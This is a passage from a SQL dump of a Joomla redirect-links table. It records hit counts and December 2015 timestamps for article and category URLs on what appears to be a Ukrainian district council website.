00:00:00',301),(21229,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',3,0,'2015-12-11 03:21:39','0000-00-00 00:00:00',301),(21230,'http://www.malyn-rayrada.org.ua/index.php?catid=31&id=276:---4-----6--25032011-&Itemid=62&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:42','0000-00-00 00:00:00',301),(21231,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=314:2011-05-20-13-01-00&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:44','0000-00-00 00:00:00',301),(21232,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=836:-6732012&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:51','0000-00-00 00:00:00',301),(21233,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=675:2012-05-17-09-49-52&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:21:55','0000-00-00 00:00:00',301),(21234,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1218:2014-02-21-15-02-18&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:05','0000-00-00 00:00:00',301),(21235,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=770:-2012-2015-&Itemid=84&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:22:12','0000-00-00 00:00:00',301),(21236,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=737:2012-07-18-13-36-46&Itemid=82&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:21','0000-00-00 00:00:00',301),(21237,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=552:2012-01-26-12-47-12&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:26','0000-00-00 00:00:00',301),(21238,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1053:2013-07-19-11-34-22&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:33','0000-00-00 00:00:00',301),(21239,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1099:------------------l-r&Itemid=70&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:22:35','0000-00-00 00:00:00',301),(21240,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=789:-2012-2014-&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:42','0000-00-00 00:00:00',301),(21241,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=613:2012-03-26-14-13-34&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:44','0000-00-00 00:00:00',301),(21242,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=739:2012-07-23-12-44-57&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:22:46','0000-00-00 00:00:00',301),(21243,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1183:2014-01-28-09-18-31&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:00','0000-00-00 00:00:00',301),(21244,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=489:2011-12-02-06-51-07&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:02','0000-00-00 00:00:00',301),(21245,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=450:-l-2011-2013-r&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:04','0000-00-00 00:00:00',301),(21246,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=884:2012-12-24-10-46-13&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:06','0000-00-00 00:00:00',301),(21247,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1107:c-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:09','0000-00-00 00:00:00',301),(21248,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1030:2013-06-17-06-46-59&Itemid=92&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:17','0000-00-00 00:00:00',301),(21249,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1125:2013-10-31-07-20-16&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:25','0000-00-00 00:00:00',301),(21250,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=824:-2012-&Itemid=84&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:23:30','0000-00-00 00:00:00',301),(21251,'http://www.malyn-rayrada.org.ua/index.php?catid=43&id=719:-lr&Itemid=82&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:42','0000-00-00 00:00:00',301),(21252,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1170:2014-01-08-11-02-06&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:23:46','0000-00-00 00:00:00',301),(21253,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1119:2013-10-25-12-26-37&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:23:50','0000-00-00 00:00:00',301),(21254,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=627:2012-04-02-15-57-23&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:13','0000-00-00 00:00:00',301),(21255,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=328:2011-05-20-16-23-02&Itemid=66&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:24:17','0000-00-00 00:00:00',301),(21256,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=194:-----------2008-2010-&Itemid=60&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:21','0000-00-00 00:00:00',301),(21257,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=734:-6-2012-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:29','0000-00-00 00:00:00',301),(21258,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1335:2014-06-07-10-58-30&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:33','0000-00-00 00:00:00',301),(21259,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1214:2014-02-18-09-51-45&Itemid=14&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:24:37','0000-00-00 00:00:00',301),(21260,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1046:-2013-&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:24:50','0000-00-00 00:00:00',301),(21261,'http://www.malyn-rayrada.org.ua/index.php?catid=15:2010-06-06-09-34-01&id=1138:-15112013&Itemid=18&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:24:52','0000-00-00 00:00:00',301),(21262,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=760:-qq-24-2012-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:54','0000-00-00 00:00:00',301),(21263,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=954:-19-6-&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:24:56','0000-00-00 00:00:00',301),(21264,'http://www.malyn-rayrada.org.ua/index.php?catid=45&id=822:----------2012--2013-----------------l-r&Itemid=84&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:25:03','0000-00-00 00:00:00',301),(21265,'http://www.malyn-rayrada.org.ua/index.php?id=39&Itemid=76&lang=en&layout=blog&limitstart=15&option=com_content&view=category','','','',4,0,'2015-12-11 03:25:05','0000-00-00 00:00:00',301),(21266,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=632:-2011-2015-&Itemid=80&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:25:08','0000-00-00 00:00:00',301),(21267,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:25:17','0000-00-00 00:00:00',301),(21268,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=543:2012-01-26-11-58-53&Itemid=76&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:25:24','0000-00-00 00:00:00',301),(21269,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1334:2014-06-06-05-54-20&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:25:29','0000-00-00 00:00:00',301),(21270,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=en&layout=blog&limitstart=35&option=com_content&view=category','','','',2,0,'2015-12-11 03:26:02','0000-00-00 00:00:00',301),(21271,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=665:-75-&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:26:04','0000-00-00 00:00:00',301),(21272,'http://www.malyn-rayrada.org.ua/index.php?id=38:--19122011-&Itemid=73&lang=uk&layout=blog&limitstart=35&option=com_content&view=category','','','',3,0,'2015-12-11 03:26:20','0000-00-00 00:00:00',301),(21273,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=483:-2012-2016-&Itemid=73&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:26:29','0000-00-00 00:00:00',301),(21274,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1010:-22-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:26:36','0000-00-00 00:00:00',301),(21275,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=728:2012-06-26-07-51-10&Itemid=70&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:26:44','0000-00-00 00:00:00',301),(21276,'http://www.malyn-rayrada.org.ua/index.php?catid=39:-22022012-&id=561:2012-02-02-08-58-39&Itemid=76&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:26:48','0000-00-00 00:00:00',301),(21277,'http://www.malyn-rayrada.org.ua/index.php?catid=34:--15062011-&id=342:----6----6--15--2011-&Itemid=68&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:27:07','0000-00-00 00:00:00',301),(21278,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=1163:2013-12-20-07-44-35&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:12','0000-00-00 00:00:00',301),(21279,'http://www.malyn-rayrada.org.ua/index.php?id=55&Itemid=96&lang=en&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:27:14','0000-00-00 00:00:00',301),(21280,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=804:2012-10-28-18-37-40&Itemid=0&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:18','0000-00-00 00:00:00',301),(21281,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1154:7-&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:21','0000-00-00 00:00:00',301),(21282,'http://www.malyn-rayrada.org.ua/index.php?catid=46:--21122012&id=885:-2013-2015-&Itemid=85&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:23','0000-00-00 00:00:00',301),(21283,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=692:-2012&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:25','0000-00-00 00:00:00',301),(21284,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1142:-------l-r---&Itemid=70&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:35','0000-00-00 00:00:00',301),(21285,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1342:2014-06-12-09-42-47&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:39','0000-00-00 00:00:00',301),(21286,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=862:-qq&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:49','0000-00-00 00:00:00',301),(21287,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1061:2013-07-29-08-58-16&Itemid=&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:27:58','0000-00-00 00:00:00',301),(21288,'http://www.malyn-rayrada.org.ua/index.php?id=51&Itemid=92&lang=en&layout=blog&limitstart=10&option=com_content&view=category','','','',4,0,'2015-12-11 03:28:01','0000-00-00 00:00:00',301),(21289,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=999:2013-04-28-05-21-05&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:05','0000-00-00 00:00:00',301),(21290,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1071:2013-08-27-14-06-18&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:14','0000-00-00 00:00:00',301),(21291,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=960:-19-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:19','0000-00-00 00:00:00',301),(21292,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=815:-16-6-&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:21','0000-00-00 00:00:00',301),(21293,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=203:2010-12-15-14-10-45&Itemid=60&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:30','0000-00-00 00:00:00',301),(21294,'http://www.malyn-rayrada.org.ua/index.php?catid=56&id=1199:-l-r-&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:37','0000-00-00 00:00:00',301),(21295,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1188:2014-01-28-09-45-21&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:39','0000-00-00 00:00:00',301),(21296,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1187:2014-01-28-09-43-51&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:44','0000-00-00 00:00:00',301),(21297,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1146:2013-11-27-10-09-00&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:47','0000-00-00 00:00:00',301),(21298,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=795:--------20--2011--108-l---r----&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:49','0000-00-00 00:00:00',301),(21299,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=614:2012-03-26-16-06-35&Itemid=&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:28:51','0000-00-00 00:00:00',301),(21300,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1100:2013-10-02-18-03-10&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:00','0000-00-00 00:00:00',301),(21301,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1074:2013-09-02-05-02-30&Itemid=&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:29:07','0000-00-00 00:00:00',301),(21302,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=488:2011-12-02-06-34-46&Itemid=73&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:09','0000-00-00 00:00:00',301),(21303,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1349:-31-&Itemid=&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:29:14','0000-00-00 00:00:00',301),(21304,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=693:2012-06-06-14-15-01&Itemid=14&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:29:28','0000-00-00 00:00:00',301),(21305,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=309:----5----6--20--2011-&Itemid=66&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:30','0000-00-00 00:00:00',301),(21306,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1113:2013-10-23-09-26-07&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:34','0000-00-00 00:00:00',301),(21307,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1082:------------2012-2015-&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:39','0000-00-00 00:00:00',301),(21308,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&lang=ru&option=com_content&view=article','','','',4,0,'2015-12-11 03:29:46','0000-00-00 00:00:00',301),(21309,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=451:-2011-2015-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:29:48','0000-00-00 00:00:00',301),(21310,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=uk&layout=blog&limitstart=5&option=com_content&view=category','','','',3,0,'2015-12-11 03:29:55','0000-00-00 00:00:00',301),(21311,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=316:-2011-2012-&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:10','0000-00-00 00:00:00',301),(21312,'http://www.malyn-rayrada.org.ua/index.php?catid=38&id=483:-2012-2016-&Itemid=73&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:13','0000-00-00 00:00:00',301),(21313,'http://www.malyn-rayrada.org.ua/index.php?catid=15&id=860:09&Itemid=&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:30:16','0000-00-00 00:00:00',301),(21314,'http://www.malyn-rayrada.org.ua/index.php?catid=4:2010-06-05-12-51-18&id=4:--1062010&Itemid=8&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:30:20','0000-00-00 00:00:00',301),(21315,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=963:2013-03-13-06-16-53&Itemid=0&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:27','0000-00-00 00:00:00',301),(21316,'http://www.malyn-rayrada.org.ua/index.php?catid=42:--16052012-&id=637:2012-04-03-12-34-11&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:29','0000-00-00 00:00:00',301),(21317,'http://www.malyn-rayrada.org.ua/index.php?catid=10:2010-06-05-13-46-44&id=1303:2014-04-29-13-13-18&Itemid=17&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:30:38','0000-00-00 00:00:00',301),(21318,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1056:-22-&lang=uk&option=com_content&view=article','','','',5,0,'2015-12-11 03:30:45','0000-00-00 00:00:00',301),(21319,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1181:2014-01-22-06-06-13&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:51','0000-00-00 00:00:00',301),(21320,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=1192:-2014-2015-&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:30:53','0000-00-00 00:00:00',301),(21321,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=651:-2012-&Itemid=80&lang=ru&option=com_content&view=article','','','',24,0,'2015-12-11 03:31:02','0000-00-00 00:00:00',301),(21322,'http://www.malyn-rayrada.org.ua/index.php?catid=36&id=468:-15-2011-120-l-r&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:06','0000-00-00 00:00:00',301),(21323,'http://www.malyn-rayrada.org.ua/index.php?catid=39&id=542:-2011-&Itemid=76&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:08','0000-00-00 00:00:00',301),(21324,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1220:2014-02-21-15-56-19&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:10','0000-00-00 00:00:00',301),(21325,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1112:2013-10-23-09-24-43&Itemid=94&lang=en&option=com_content&view=article','','','',4,0,'2015-12-11 03:31:20','0000-00-00 00:00:00',301),(21326,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=507:2011-12-19-17-10-52&lang=uk&option=com_content&view=article','','','',3,0,'2015-12-11 03:31:29','0000-00-00 00:00:00',301),(21327,'http://www.malyn-rayrada.org.ua/index.php?catid=51&id=1022:-lr-&Itemid=92&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:36','0000-00-00 00:00:00',301),(21328,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1308:2014-05-05-05-20-51&Itemid=14&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:31:38','0000-00-00 00:00:00',301),(21329,'http://www.malyn-rayrada.org.ua/index.php?catid=45:--14112012-&id=787:2012-10-15-09-13-25&Itemid=84&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:40','0000-00-00 00:00:00',301),(21330,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=911:2013-01-22-13-27-41&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:31:47','0000-00-00 00:00:00',301),(21331,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1208:2014-01-31-13-48-49&Itemid=14&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:05','0000-00-00 00:00:00',301),(21332,'http://www.malyn-rayrada.org.ua/index.php?catid=58&id=1306:2014-04-30-09-40-02&Itemid=105&lang=ru&option=com_content&view=article','','','',1,0,'2015-12-11 03:32:09','0000-00-00 00:00:00',301),(21333,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1010:-22-6-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:12','0000-00-00 00:00:00',301),(21334,'http://www.malyn-rayrada.org.ua/index.php?catid=53:--25102013-&id=1078:-2007-2015-&Itemid=94&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:19','0000-00-00 00:00:00',301),(21335,'http://www.malyn-rayrada.org.ua/index.php?catid=29&id=197:-----l-r--2004-2010-&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:21','0000-00-00 00:00:00',301),(21336,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=670:2012-05-08-05-15-51&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:32:23','0000-00-00 00:00:00',301),(21337,'http://www.malyn-rayrada.org.ua/index.php?catid=11:2010-06-05-14-33-33&id=1131:9-------&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:28','0000-00-00 00:00:00',301),(21338,'http://www.malyn-rayrada.org.ua/index.php?catid=38:--19122011-&id=463:-2007-2015-&Itemid=73&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:30','0000-00-00 00:00:00',301),(21339,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1112:2013-10-23-09-24-43&Itemid=94&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:32','0000-00-00 00:00:00',301),(21340,'http://www.malyn-rayrada.org.ua/index.php?catid=56:--03022014-&id=1201:2014-01-31-07-43-11&Itemid=97&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:34','0000-00-00 00:00:00',301),(21341,'http://www.malyn-rayrada.org.ua/index.php?id=36&Itemid=70&lang=uk&layout=blog&option=com_content&view=category','','','',2,0,'2015-12-11 03:32:37','0000-00-00 00:00:00',301),(21342,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1319:--------2014--&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:32:44','0000-00-00 00:00:00',301),(21343,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=568:-2011-&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:48','0000-00-00 00:00:00',301),(21344,'http://www.malyn-rayrada.org.ua/index.php?catid=43:--25072012-&id=709:2012-06-14-15-04-11&Itemid=82&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:32:51','0000-00-00 00:00:00',301),(21345,'http://www.malyn-rayrada.org.ua/index.php?catid=47:-21022013-&id=928:2013-02-21-09-10-17&Itemid=86&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:53','0000-00-00 00:00:00',301),(21346,'http://www.malyn-rayrada.org.ua/index.php?catid=33:-20052011&id=315:2011-05-20-13-07-47&Itemid=66&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:32:59','0000-00-00 00:00:00',301),(21347,'http://www.malyn-rayrada.org.ua/index.php?id=43:--25072012-&Itemid=82&lang=ru&layout=blog&limitstart=30&option=com_content&view=category','','','',2,0,'2015-12-11 03:33:02','0000-00-00 00:00:00',301),(21348,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1035:2013-06-25-09-55-31&Itemid=14&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:33:14','0000-00-00 00:00:00',301),(21349,'http://www.malyn-rayrada.org.ua/index.php?id=53&Itemid=94&lang=uk&layout=blog&limitstart=10&option=com_content&view=category','','','',2,0,'2015-12-11 03:33:16','0000-00-00 00:00:00',301),(21350,'http://www.malyn-rayrada.org.ua/index.php?catid=29:--15122010-&id=192:2010-12-15-13-29-12&Itemid=60&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:33:25','0000-00-00 00:00:00',301),(21351,'http://www.malyn-rayrada.org.ua/index.php?catid=42&id=683:------------------------2012-&Itemid=80&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:33:37','0000-00-00 00:00:00',301),(21352,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=627:2012-04-02-15-57-23&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:33:39','0000-00-00 00:00:00',301),(21353,'http://www.malyn-rayrada.org.ua/index.php?catid=53&id=1090:-l-r-&Itemid=94&lang=uk&option=com_content&view=article','','','',4,0,'2015-12-11 03:33:44','0000-00-00 00:00:00',301),(21354,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=669:-2011-56-&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:33:46','0000-00-00 00:00:00',301),(21355,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=742:-14-&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:33:54','0000-00-00 00:00:00',301),(21356,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1323:2014-05-27-13-21-50&Itemid=70&lang=en&option=com_content&view=article','','','',1,0,'2015-12-11 03:34:06','0000-00-00 00:00:00',301);
INSERT INTO `fw3gt_redirect_links` VALUES (21357,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=1187:2014-01-28-09-43-51&Itemid=70&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:11','0000-00-00 00:00:00',301),(21358,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=884:2012-12-24-10-46-13&lang=uk&option=com_content&view=article','','','',5,0,'2015-12-11 03:34:13','0000-00-00 00:00:00',301),(21359,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1154:7-&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:15','0000-00-00 00:00:00',301),(21360,'http://www.malyn-rayrada.org.ua/index.php?catid=47&id=930:2013-02-21-09-13-00&Itemid=86&lang=en&option=com_content&view=article','','','',3,0,'2015-12-11 03:34:24','0000-00-00 00:00:00',301),(21361,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1147:2013-11-28-09-57-12&Itemid=14&lang=ru&option=com_content&view=article','','','',3,0,'2015-12-11 03:34:26','0000-00-00 00:00:00',301),(21362,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=1131:9-------&Itemid=14&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:28','0000-00-00 00:00:00',301),(21363,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=734:-6-2012-&Itemid=&lang=en&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:40','0000-00-00 00:00:00',301),(21364,'http://www.malyn-rayrada.org.ua/index.php?catid=36:2011-07-21-07-51-53&id=468:-15-2011-120-l-r&Itemid=70&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:42','0000-00-00 00:00:00',301),(21365,'http://www.malyn-rayrada.org.ua/index.php?catid=11&id=869:2012-12-16-16-05-45&Itemid=0&lang=ru&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:51','0000-00-00 00:00:00',301),(21366,'http://www.malyn-rayrada.org.ua/index.php?catid=33&id=326:2011-05-20-16-17-28&Itemid=66&lang=uk&option=com_content&view=article','','','',2,0,'2015-12-11 03:34:54','0000-00-00 